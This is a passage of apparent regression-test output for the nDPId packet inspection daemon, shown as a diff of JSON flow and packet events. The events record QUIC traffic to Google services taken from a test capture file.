17rH5uegaqgsAUwjH1c2UBlUjKpOyFZ+vURC9HPm3ZN\/AmFoBypd++hTChaH8TxLeog0xRzbwHCm0PbKFRbASn2bhiLaCoa2lU2VL20lJE+ax9ltZKxjkLaHbInU1egJzE5Ozq274xYL+oZA2MHpO\/SvXg5YcqmFZBb7QU7uJnGtoC6VyfqEMbfITMloZv6UlVclDscyjvESn6K4S5HE2T1Di30EscldcqKgvxZsNQVrOrtKLdcYnpHdO2rWcwupv3J3uhq2VmkdCL9eV1aP+\/omm+CRR4vmacmNO+0V
UXWSYWY1o0ANvSXclIcPCmXoAeFks9hejblFemNUPDYGzI5F7uu7XOa7qRlrb4VRHYDm+IGHatsOChH\/ovC2i1ER0eU\/ZmnhnIkZU97Pyha243JnjMkAwY9QrCN0+FUsuH91rZG9m+lGHaPJ\/jVLdm2lAyDFa+zibx5uvSnW8CxhmkBIgZ+LcWtx9SaKCxT1Vc9Xf2EVqaZNITbzO2oIGdrJDJ4HVczVgPNlPqogSnBzFP5Ik8qoDJ7h6Q4BUKLPyjQd\/ev7WJ1EEQcjfoVc2KFDAa9tCVQaFSH39b"} -00947{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":13,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621421257105,"flow_last_seen":1621421257105,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621421257105,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"112.1.105.138","src_port":55844,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.PlayStore","breed":"Safe","category":"SoftwareUpdate"},"quic": {"client_requested_server_name":"android.clients.google.com","user_agent":"dev Chrome\/92.0.4503.3 Windows NT 6.1; Win64; x64","version":"TLSv1.3","alpn":"h3-29","ja3":"169051af8572ac08ea1ddeee0db208bc","tls_supported_versions":"TLSv1.3"}} +00947{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":13,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621421257105,"flow_last_seen":1621421257105,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621421257105,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"112.1.105.138","src_port":55844,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.PlayStore","breed":"Safe","category":"SoftwareUpdate"},"quic": 
{"client_requested_server_name":"android.clients.google.com","user_agent":"dev Chrome\/92.0.4503.3 Windows NT 6.1; Win64; x64","version":"TLSv1.3","alpn":"h3-29","ja3":"169051af8572ac08ea1ddeee0db208bc","tls_supported_versions":"TLSv1.3"}} 00630{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":14,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621421260215,"flow_last_seen":1621421260215,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621421260215,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"37.47.218.224","src_port":59827,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 02307{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":14,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":6,"flow_packet_id":1,"flow_last_seen":1621421260215,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"thread_ts_msec":1621421260215,"pkt":"AAAAAAAAAAEAgb5NCABFAAViPkBAAH4R0KWokEAFJS\/a4OmzAbsFTgQMzv8AAB0Ij53aBXaFj90AAEU0SLKO1gj8GM\/7BPKLNut3gQPWBzQn5YjeWsRqAQjUyhVmdT7iLh+mIwvgIVvzUOLJxhHjuQctv0LRX631bbBEMMF3pBOdFjFZQIZkKsJpfaTuV+rwxUnU2bHKeVloIebl9Hd03S1kOttznSJAQXPQYVQdCo2nGLaWCR4YNzOkZh4A+Iglp3ynlFiH1Kgq3ax2c8pTIXpNl9L3OjDkEQQYoqa4BnvX26mCDoVc1q85ueAmXRWZdEScZQq5AdybLm23nnSrRgIVtgrwmK88QIPr5bJG3kChUFNEb6Qj326VwodIu2nJl3TnhY2xrD54TcIiyK8M1mjcjF66nfwNKkEIT6E\/SESFufOVlvOb\/aB7WAdl9ft+Mim9U4BlJLbA1M2hEMXyNr\/s6u+cjHBsYueURjL6cyap74D70FwK4fSE9fk3xYY2MNPKF\/BAL97jnAn1k6A2tqzJHsZwSzyyXpoLuyctUW\/+nvBXA28d0MohSUQ+k04\/p827rPYEI2AWonQSMbQCAz0aXMWa9QgMEzO1kdWGqTKHT6GRgMR41luSMkba7gddevQoGSDn8n\/q9o1I96kD59QkNrWXvBgRpPjPEDuAZN3lTvhkh
I1wkMsnQCh+3FDr1mc7ThSOHVDvrHj1Lm33pCihRhcviFSvDh9KDt2ldWi8CRH3IP27mXAgwEWN7MW58CZ7xIfXHX426siygUSb80QcGh0MbC2cqC6NdXb7jwDX+dBo9j\/62Zx0AC29OcRJNYu2PToqGFzb0MsLqQh6dq9QT4wGAMMKTUCoC77oTHhUvrLWjGCXOjuULsdJuEozP8mmiwHfyW6om2UpbFP3XUkziu\/vMyloESiBOvaG1xmOFxFd2n7o08eusUshscLGHeSq3kK1TNkYBgJH7lGzZYlF3A1w0YXAbAoRDewGZBRGgAycWnJxG9uq\/6QiUS5MkDVeUWNCVal9TwMX5\/i+60rZCuCCsNfpwFYF65Kddt1lyUiJ3yQQ3yrEC81\/+AlvSh0nVJu7TD4+IV4yfqhOezTjS\/jq7q0STXO9D1O5OiHCPhH1vWKx7PnZg2bufgr0umZWt9\/ulektccxj\/7G2bU+FhscpVONsqMMSe8nszXl1RfQbopA6Lr2XL+yzBEuqedNG\/oarLdzVzfbciDEAHhtO2umw8IL7MpmOpbUsppzeNfDP5NjrfxdP3ZZ6+53+pyzcLVc1IIupv0HiBGLs39L3xCnLaO9KJhlGu4\/NgXTntIMz6nwsIjU3XYs9p681vW714W+A\/9BGND8qAN+OH91XxSG84vJV\/6Q94Q6u6XMjJ1a8fRCqQvwG6Y6QlpageJG0MkaaEcPNuZR6lcsvvgXozmz12VWNDD7XlkC9RlIetaFOlO+wCjrAWaaad7F01KTsrONi0Minvqx6ZjHIYa4CdvnQmfIFPvRG2dbtVMue5p2IpRYRTQ00H124FWSAbpmFufFkxzz3roNFvZ8L48qlRvbqfoHbzlo+diCyOjTzCaiLy3wgom7EMWMSpa1wNanraUOP0Cgafhkkk58UkpZ84qvXH6P3NJfusjarmU4bkoENsKKZG84yQKYpg9lzqxivHXVnRw8D\/wblKD0B6HjUVdnwNG6dMjeNePdobGQc+ezoD\/iBkZC2nsQG9kk\/83\/KYDIo1frQ9PGAUp9fb1fO3JXbQdb7gxYJ59BL9yWuwgkXl0w63hIxIfYXlPi6Ly8hrunM3g6mrjaqyyX2Rcbv6s+jqMK\/tNm146acDlsVlCvaDwMeJ0jY3HGC1re9"} -00947{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":14,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621421260215,"flow_last_seen":1621421260215,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621421260215,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"37.47.218.224","src_port":59827,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Advertisement"},"quic": {"client_requested_server_name":"www.googleadservices.com","user_agent":"dev Chrome\/92.0.4503.3 
Windows NT 6.1; Win64; x64","version":"TLSv1.3","alpn":"h3-29","ja3":"169051af8572ac08ea1ddeee0db208bc","tls_supported_versions":"TLSv1.3"}} +00947{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":14,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621421260215,"flow_last_seen":1621421260215,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621421260215,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"37.47.218.224","src_port":59827,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Advertisement"},"quic": {"client_requested_server_name":"www.googleadservices.com","user_agent":"dev Chrome\/92.0.4503.3 Windows NT 6.1; Win64; x64","version":"TLSv1.3","alpn":"h3-29","ja3":"169051af8572ac08ea1ddeee0db208bc","tls_supported_versions":"TLSv1.3"}} 
02316{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":15,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":6,"flow_packet_id":2,"flow_last_seen":1621421260513,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"thread_ts_msec":1621421260513,"pkt":"AAAAAAAAAAEAgb5NCABFAAViPk5AAH4R0JeokEAFJS\/a4OmzAbsFTtDzzv8AAB0Ij53aBXaFj90AAEU0pVcIObrUqLyarXAGM4rQnKh+52v7aXQUj4GvYb\/wSM3mSBNf9xPhl9FK4ipC+fhOPIGStb9x1zMsHAo+73hJqwqHkOJ6bvqIt\/sGsmK\/ofAbwetCqPp3T3jPrhZY2wETFAN+9XScTYEDqUnrkDVy0GQ9sV5jSug2PtRHEWT8gywc4K+57NH6Ash2BqW8UNx67owC0vArWq8CvngpIrDNQreXdzSYn4wwYJX2miwA\/wEl0gm+SuEtBprHj2uZlu8koRLbrv1VGIheOQE0Nsbta5SQsxKKjZN97iHSxerp4BcNtjqivy7Li78i5gH\/2pVLdrR0qv8negi\/kKSblvjfoEPy4ijg9\/u4RIwFeksyqF89on0NdQuL2+Gj5diZo+zdIi+Q5e5It+HBsRtpXguuRB6SEpGadVpkaDn0YwXpYgs1txuTawl7yQ4ZuSlTzVEDd7qtQzM6lSpvLx3uSWpFvM3GAUysnOzVg41krR4Ulkj+VTnN5KAol+nOz6IUyDJ\/IkiNKdoNBVXk9AvQ0S1r+og06pTejXAB5wfjkpZVXgsRY+N\/xjKDMGEVHELh5Epoie736CGpcBsBBIKZcR8DMnHyPpGJLzAlOtKDi7\/Gt1\/jx+MHSSEKCZ4TotHxg\/Xf1RgIKf3lQnbUe3aB\/BOL3vek35mgVs7wyrmKZQpuJFMrj\/LPS2T3Q6UihyVSZ+cz9VtJhU0kIVXZbg7MeMCnqgv\/yNMDFFdkvKL7oO\/uUcUXQlY5VoYeeWgNSKc3XjyJMIAV+31aTEM5FsgjpZRp0sNQm59Xb20piAIn8k+RicW\/PxKQpSBnnGgYgJK8jaPlnBgEXw4IIpTVsui1MIn1bGpT5SlOh5TYtcpeX7Eq2Gn++tj8GvDhyQ4KPUI1FbbJ0NbqPqngUTYVzF2pjPV2RsKl8tMqOs19XG5pvHEWTNic8cZYT8FgNSHC44qfM5PGUK0zq0\/PiawZaqUQYRh2PCe37WABPV97AV1GUOIJPd1hL9x+acIY52OdywDA\/3ZRhz5AH3VOtXi6eFcGzu2Z1on4V\/38mIWBpYZnh4O771WNLcVabHuK1h65ee736lPwAH1pmFpETlxU2aR14ZxWeG\/L1t\/uMh1SsDCguq7KQ7kO6W6v78BBvY3UFcMUOQm3Y79YpovoK3RKpLlQwqcGToRvTj9HWy45cQaegkrn6dkZvlPtVXm4u0bH0vMFgb+e9S\/Eo9e7MRlTrDXo2UnQkJhJrgWtcgvYsSe2mckaREDq5dc\/ejmdjc6w7425wByLtdYkeZKJsBJlRzzSwJcvg13az06KgVs\/MgeRqXRnkapWJu4JtcC0OoEfpVDvdMByMpq6F01Orvj99pih8TBfE5K9cwc7o7eRFGa\/vbR8mRB4vs\/zIS2xlYSXBpmrEq\/STtlWQ3MwDGTQBh6b1fNakGwhN+beHXCdenc2JEHwzcegc84ZFNYAaFHv
YtEA5j\/sdHZ5R7zQpmw8s757IIPaEVgddHeol88L1qAA1ESXtRCjHYy+RZMYFJvwihgljin3jiK2udMMWEQO4P1W\/JF0TJv+oob679cUTxkmK0rhv5xSAjzbEBoPpZkQFmxUaC6gROBGQvRXx3h\/KdYcwayetIOWHEWFh0VV8+Wh3MzCdnjJMXP+plFSgGMbc+RC\/vLnsb2eKO8LMYQ0pI9YKYByfpqJs3guXOtrpg3uzEalWzsyVUl9MKGOQYcVvIVpCkpNZnvU\/i5cNJONYeYNbIy\/q5jUt2zwSPACITT+6UtXWpul6XNl"} -00732{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":16,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1621417628801,"flow_last_seen":1621417630732,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":5400,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621421260513,"l3_proto":"ip4","src_ip":"147.196.90.42","dst_ip":"177.86.46.206","src_port":61647,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Web"}} +00732{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":16,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1621417628801,"flow_last_seen":1621417630732,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":5400,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621421260513,"l3_proto":"ip4","src_ip":"147.196.90.42","dst_ip":"177.86.46.206","src_port":61647,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Web"}} 
00632{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":16,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621421316093,"flow_last_seen":1621421316093,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621421316093,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"241.138.147.133","src_port":51053,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 02312{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":16,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":7,"flow_packet_id":1,"flow_last_seen":1621421316093,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"thread_ts_msec":1621421316093,"pkt":"AAAAAAAAAAEAVM4PCABFAAViQV5AAH4RSIeokEAF8YqThcdtAbsFTsw1yP8AAB0Id4dqLmNRgiwAAEU0wtYlbbuFGBXp2MCVE6We3QfitRrLbfHeFapauAVaYK5AL9PTMbG\/nZBDDFATIm20jlpnFDBXnrozoSQkKhZiwvFuA+YJAKUvqg2QPKM3oU8xpfKkT2AQR0J9DkN5tfQ0NXF6X7eJrYc4ofmRw8O4fWLwYHZ3YywSIJBBxpk3DxsC2udaDZJvqGhhrqx5lxHNdgWl7nWJub5bWqgA7RiFwSfPMI\/5kRug+dhYRp7DC3Ee8zC6gPghQE+QP0amaa1arTeTP0yuasl+WnsmI9atR02R+W1DzVE2\/wBMK8xOVHY9tqlEVzRvN\/FEe84ZW3K+FiAVxrMfFrQuHuvcnbcHTHBnMHQYqazejyT6z7dujWBncKjH6yckijpEXWZXNsAuDtLV5T3g2q3nsAzYqPmxjAwq2L9jEUkACO\/glUxPaUIbzRZMAWrn1JnfawlUtFWDoUkmp2jeSdN3M4DOV4Btcfl6JE0S5mBMR+cTfbMcWTfdpp7BQFYSHPJCCmfpgjfpU+1qBx\/swhbFbhxpxlnelvZfSKLGYtrKIMbdO3dvXbJ\/svUATGYLFdU0QPDusq4rUjjYNOu89YeAlu27MHBziCZnV7KQ\/7CZZ62vBer12fSYwgYC9kFuhA1vCwIWWEI0nqiCF8WEuILGWjP7tGrAuxfQQVo5hc9wDgMsePag6LNkwHcnSN4R4KOS1V6VWYmSISoheOtUuN0\/+N31BX\/BBdcE+K\/zMLfLAbEeSVyqVT8J149AtoSXuMJboIYDsPyuNx1sUrvqH1bQF\/7OvXtx\/cdwuq0y9FpLI4rLUI2maANSTyvT2wXdthl04Z\/YTlfhB2d0v18nfS
nZ0lHIWro94Qz9tRk3pZNg\/6bOm24Nb0c7krS9oaKWYD\/nW26GWKUOS\/YmbucW\/B1591GDEr7Vz9Medns2YxuZHMa760vt8vLL\/edsarlqSTG7iC2dyVOn2D7FBqAY9O0XPf2C6QywOMobFqtrNOS8\/ww+Ef0n0CBYfsd8N\/A33enCbf65kj2J8cjGSNsKKNBj4tAphcU4pREZZB+O3\/Ly1nrLSiPKqvrwDlraB5bWLyenPZKnd0anwZjJixIGkNqzXa4ISQSJFmR1apCq9LxUfCQKJSnoHJi7zWpvIrTdh+1E4LBshyGiVHdr861ZeGlKojdwmnjQq4UIgYBm588gXH6fnrUcTY6x5R5SkG6ySP3+9FKCni2sN+s4jOB1WugJuAizD3hNzwNrPVPmY7ea2u9AgEEAbZ5tqDi\/qty5LhlhUJfgz0tpuOOG5sjNxDfBKwkmMXzbB0UWP\/ZOymvNdRvIO7mkPx8fUewze1kB2XBKTZu\/jjeqOfyykDMv2U5d4ECIcR1ME5SBUPF+cG4JDZip3X9Ncjk8ohwZ9STseLqJ9OTjbovHrwRkTp9ZFiBkXSVMJZ28qvMwt56L7k\/AJJHbrnWAxnK7I23CERceW6rAMx3gAvjR7jpii0Z6y9ut3843URcFEKSmPwW484nhFdNDcZj2opvoj2jz3w5PYglOwvrlo53izXLdla3jEPq0EWSsFCgjfCn1Hu\/0iFm0F9A\/NJaZOLHbBv95sOyVAyhhTp9ia8OHAoDyKO3fdAgduAMCr8e4e6A6OeMRMM9uZdO8nPHniB7\/fRhFarX8\/hBQLOvGYNTxmX4mUBEYAvdX9oiTEGFxFQYms4wxcWEcL4GBZVSteaongl\/UtzVPYTVaH6Ywp9r8fQxMP+pvN9mS74aDwI6voKY5QYc+FIAxKgJlDQtsiDCfBJp7"} -00954{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":16,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621421316093,"flow_last_seen":1621421316093,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621421316093,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"241.138.147.133","src_port":51053,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.GoogleServices","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"content-autofill.googleapis.com","user_agent":"dev Chrome\/92.0.4503.3 Windows NT 6.1; Win64; x64","version":"TLSv1.3","alpn":"h3-29","ja3":"169051af8572ac08ea1ddeee0db208bc","tls_supported_versions":"TLSv1.3"}} 
+00954{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":16,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621421316093,"flow_last_seen":1621421316093,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621421316093,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"241.138.147.133","src_port":51053,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.GoogleServices","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"content-autofill.googleapis.com","user_agent":"dev Chrome\/92.0.4503.3 Windows NT 6.1; Win64; x64","version":"TLSv1.3","alpn":"h3-29","ja3":"169051af8572ac08ea1ddeee0db208bc","tls_supported_versions":"TLSv1.3"}} 02312{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":17,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":7,"flow_packet_id":2,"flow_last_seen":1621421316389,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"thread_ts_msec":1621421316389,"pkt":"AAAAAAAAAAEAVM4PCABFAAViQWNAAH4RSIKokEAF8YqThcdtAbsFToluw\/8AAB0Id4dqLmNRgiwAAEU0su8kgEC6CAiECyO1DkLdw6Gs9g5xqr46q4bXQKhwHnhSO1cvEZxiK8zZ0UUvMHGZI9iz4bjhoHMMbIOMlQjzD7lXKLskiaS9BH5d+nSpKWAlTk\/VzCyrJIDUEaoJEECyuW3tKvwl9spRker8xQmMYntXENQ02IwoiaKvWtw+SOjVwVA8eWlOm9NAMebNzUMZPYZs73GU1OPqu9byjmqUVZ3gNjVQQ\/nOwz51imkNuYu+w7\/8LyJUGaPm5Fwuk3Bsj2YKxipADsvK8J6MTwckTe0mCX\/jSQ76gOCjnkz8hrVtk4EjqvRSRrrQmlglk\/VPrf\/qKvU58cAcB2xVriX4o5h7C5eOAMRU3+HqrLXNHljg7aEauwVEO8m3ekwDO3icqHHRs7WM+ylBxpldD58pCtxwZ0ij9QfdRWH5ZxqEDPqJoHBdj95wIyZ4ORnYdmNnyGHi8MllAUcQIs8tjWMWB3yoe5EdClD6nZBCG59SvjdsYcNJAVVbBE80ehJfa\/upspBC4CISksJmb
wdDStCmaDAP9wtOaXIqg9O5ZkIDmdoOOPEfmjm9K4dOQ6LB36bvZXw3SHE4hzY8DBpxFYHrnweWWjg3jzTy7z1UBgCcL5L8M3V1G4k+M8cjEG+qLyzWt+I0t9W8p+QppsTxLemIrKhRlTLQxRaQrn45B1vfZAeZl22mIthc1844odpSJYhOqC6tqIizeYmhjyC8Xc50S3AW5Mvlz9zSASlezjlHYB6l0h4HiECb78KTFOP0RzpXeC761f6XbR3TSUj2Kd6CiigfBxHImCUWBJeYhQ63K13s3Mm3\/yXQW+jtNDe40QrWm9YjjkoIVMSIWB0+IuXcOTK5iuV5r2NouN\/mq7KvUEJUIOslfnalmFaf7ZfIdPjgyQVz9FrKHnQkvaAtpM4SfwUn5akQL58gGN5ju0ezdhVBAUVoBrH7IQl1dE5m2gKH\/nc0+RTVVCbReUNeb\/d89W9jKsi0qHAjg830USO454jnFfGNPY396nJq\/esXpli7iKbr\/IAN7feLYAiWUNShRLTeLj0DM+fUbWyB7fiC2WAV\/4DdYTKVEz03e+e0crF+jhU0\/1fTcsMLkra8V1CBeXadKcji8HnzmIEixBMdXwKZYUWkoYB+sbVXni\/V+D++lf65eXUFF31BC5lP3qxi9ycB00LRdjtUjOItXt+m1hKug2VkfXSqpqc3\/GtG5atDCNyPml8KVYSebQNsNdtmEfNkMvyIkKWIyHjBBCaaBUw85r3hizTmBO4zshJ54arJGmqYVjcViNP8016YDZ66VoiHKaJw\/kSImQpkWf0lmgqvatzHhJ\/LfjV6hqNjydlZCW3sLZFOzRqsHvU5fI\/FmsYH8YkApnb+m45Kx2rJzSfYc+L2hlvF4a7+7fNL+7iaVFfd\/CRuXc9u272HHy40jLVNdRPqq4VV3rne\/q0H\/V1m8ntT3AELDOezhMgwVdok3Al1xhogWoqppG21ACx3PuonkAEFwkyjAL9ONzWF8DLDGXAOEdTah38TMQ2tg2FGelPV6Zo48hsuS172HDmBfJNthoNpqM6oYASTG\/RxdJdiw6zTrPbRM1ewux4TQduH6K6D3mWsV29BQOTHS0XXpDSszpB0pT5xkizyunUsTMnSmkyD6zVNXzQ5EMXzILn\/+7F\/G\/+5jctdI6\/dPPPLJpa6WPKzVPzwwzbjqGjx703Yxr\/kJULthDE\/zZhbousd0J3udWSBLz+4ztsXYH8xhH3IUM9oirjdGfttWqzyUvhSRYzH"} 00598{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":18,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","packets-captured":18,"packets-processed":17,"total-skipped-flows":0,"total-l4-payload-len":22950,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":7,"total-detection-updates":0,"total-updates":0,"current-active-flows":5,"total-active-flows":7,"total-idle-flows":2,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":35,"global_ts_msec":1621425498439} 
00632{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":18,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621425498439,"flow_last_seen":1621425498439,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621425498439,"l3_proto":"ip4","src_ip":"10.117.78.100","dst_ip":"251.236.18.198","src_port":44252,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 02308{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":18,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":8,"flow_packet_id":1,"flow_last_seen":1621425498439,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"thread_ts_msec":1621425498439,"pkt":"AAAAAAAAAAEAYl3ZCABFAAVi7ahAAEAR4FYKdU5k++wSxqzcAbsFTidpxP8AAB0Id06oCGAS\/SQAAEU0ed34HhSjMqu3wM3rp8Z7ywfKnATeCO1KNQbG+Q1AYYt5I2GKbEI4LPmTF\/Dg8oRvZW7+Hps\/zeWj4mRYkEWQqTJ1jKptKM4UEpyPZZwThhNGXqmj6pg6xKApWE\/oyF9g97k8sBAbAFjDVYEhNEZijtx\/4YuODy3D9E7bPZxpgcPMwpkKYui5mIAEgbi8+Rn0i3hcxUwY7q57V8pjWYX7+ImwcGnArVGy1OpvIF+ketJD73EkvbYzvYqF\/dx7vL5C3WdaRiA9Mfj4FAMj0RdomtiauTwZ9tZGvrn5iZc92HxM4jvRW53IfC7AsWzDXs2r5WAp0EASs6EpiisrRUGhmoOMYgx78xwP+jWjx1XXxbRaJ2HQc1mG\/NdnL1nuvR8nTgTtoDWHE51rI8jwmgCKy\/MRsXgdRCTYt8oDCgeFipZsTgwY7S+w9r+p5dQqS7ggXdDcdXTMpzrMFGpZUtfmnyOuFY8EUJBOZtyPVfAgZ2J9lHR4O7H0HFN20uv52\/nqryE+o15lojuNbE7xE6hnJRxYacEhTZ+adxZvTe3ZbcZp+ArC5OwrDguig7jjNBMIHugEUzqkfH\/jaFQLD8JFWvrgHaj8qu5B5PjtqF5oB1qsGzCGjGh1UBZltV0pg4iY3Fee6NHV1exKrosArB\/8w\/C5lj6qgKibGsNPFBHUDqfs6Jz8s6FD8M0RwKxS0XYvh4HQDhIs8KDnCgCOc5ZqpGzAxWE2sFtQm1X9ZdTNBYdCxTR75QqGKVUyAwDY6MS5DrXKqWXB4m86kt3QfAFZUD0r04ROd5Iy0wrnwdGHMkbwXSsDDW5fdt4YYwn\/mhfO7TJ4ZKBrSJ5
